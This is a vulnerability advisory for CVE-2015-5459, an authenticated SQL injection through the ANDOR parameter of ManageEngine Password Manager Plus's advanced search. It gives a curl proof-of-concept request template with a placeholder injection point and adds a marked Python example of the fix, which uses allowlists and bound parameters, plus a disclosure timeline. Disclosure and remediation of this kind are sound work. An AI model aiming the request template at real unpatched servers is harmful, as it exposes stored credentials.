CVE: CVE-2015-5459

CVSS v3: 9.9
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description: An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to SQLAdvancedALSearchResult.cc. The SQL query is built manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.

The problem lies in the handling of the logical operator (the ANDOR parameter) that joins the conditions when more than one condition is specified in the advanced search: it is not escaped before being placed in the query.

PoC:

$ curl 'https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP'
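The following is an added example (not code from ManageEngine or from this advisory) of how a multi-condition advanced search of the shape seen in the request above can be assembled without the flaw: the ANDOR connector, the operator names and the column names are checked against allowlists and mapped to fixed SQL fragments, and the user-supplied values travel only as bound parameters. The table and column names, the CONTAINS/EQUALS operator set and the sample resource rows are assumptions modelled on the PoC parameters, not the product's real schema.

```python
# Added example, not ManageEngine code. Demonstrates allowlisting the
# connector/operator/column tokens of an "advanced search" request and
# binding the values as parameters. Schema and sample data are constructed.
import sqlite3
from urllib.parse import parse_qs

# Only these tokens may join conditions; anything else is rejected instead of
# being spliced into the SQL text (the ANDOR parameter in CVE-2015-5459 was
# not handled this way).
ALLOWED_CONNECTORS = {"AND", "OR"}


def _like_pattern(value):
    """Escape LIKE metacharacters so a CONTAINS value matches literally."""
    escaped = value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return f"%{escaped}%"


# Search operators map to fixed SQL fragments plus a value-shaping function;
# the client never contributes SQL text. (Operator names are assumed.)
OPERATORS = {
    "CONTAINS": ("LIKE ? ESCAPE '\\'", _like_pattern),
    "EQUALS": ("= ?", lambda v: v),
}

# Allowlist of searchable fields -> real column names (assumed names).
COLUMNS = {
    "Ptrx_Resource@RESOURCENAME": "resourcename",
    "Ptrx_Resource@RESOURCETYPE": "resourcetype",
}

# Constructed sample rows standing in for the resource table.
SAMPLE_RESOURCES = [
    ("asd-server", "Linux"),
    ("asd2-db", "Windows"),
    ("prod-fw", "Firewall"),
]


def build_advanced_search(conditions, connector):
    """Return (sql, params) for a list of (field, operator, value) tuples.

    Raises ValueError for any token outside the allowlists.
    """
    if connector not in ALLOWED_CONNECTORS:
        raise ValueError(f"unsupported connector {connector!r}")
    clauses, params = [], []
    for field, operator, value in conditions:
        if field not in COLUMNS:
            raise ValueError(f"unsupported field {field!r}")
        if operator not in OPERATORS:
            raise ValueError(f"unsupported operator {operator!r}")
        fragment, shape = OPERATORS[operator]
        clauses.append(f"{COLUMNS[field]} {fragment}")
        params.append(shape(value))
    if not clauses:
        raise ValueError("no conditions supplied")
    sql = "SELECT resourcename FROM ptrx_resource WHERE " + f" {connector} ".join(clauses)
    return sql, params


def conditions_from_query(query_string):
    """Parse ANDOR / COUNT / condition_N / operator_N / value_N parameters."""
    q = parse_qs(query_string, keep_blank_values=True)
    count = int(q.get("COUNT", ["0"])[0])
    conditions = [
        (q[f"condition_{i}"][0], q[f"operator_{i}"][0], q[f"value_{i}"][0])
        for i in range(1, count + 1)
    ]
    connector = q.get("ANDOR", ["AND"])[0]
    return conditions, connector


def check_advanced_search_request(query_string):
    """Return None if the request is acceptable, otherwise the rejection reason."""
    try:
        conditions, connector = conditions_from_query(query_string)
        build_advanced_search(conditions, connector)
    except (ValueError, KeyError) as exc:
        return f"rejected: {exc}"
    return None


def run_search(conditions, connector, rows=SAMPLE_RESOURCES):
    """Execute the parameterised search against an in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ptrx_resource (resourcename TEXT, resourcetype TEXT)")
    conn.executemany("INSERT INTO ptrx_resource VALUES (?, ?)", rows)
    sql, params = build_advanced_search(conditions, connector)
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    qs = ("ANDOR=AND&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS"
          "&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS"
          "&value_2=asd2&COUNT=2")
    conds, conn = conditions_from_query(qs)
    print(build_advanced_search(conds, conn))
    print(run_search(conds, conn))
```

Note that the connector is never taken from the request verbatim; it is compared against the allowlist and only the allowlisted string itself is joined into the query. The LIKE ESCAPE handling is the second thing a reviewer would check here: without it a CONTAINS value of `%` or `_` silently becomes a wildcard search.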

Timeline:

  • 30.06.2015 - vendor notified
  • 15.07.2015 - vendor fixed the vulnerability in version 8.1 (build 8101)

References: I wrote an article about "zero-knowledge" secret management systems that compares existing password managers and gives guidance on how to choose a really secure password management software:

Adamczyk Błażej. Secure and convenient secret management in distributed computer systems. WSEAS Transactions on Computers, vol. 15, 2016, pp. 327-333.
tags: ManageEngine Password Manager Plus CVE CVE-2015-5459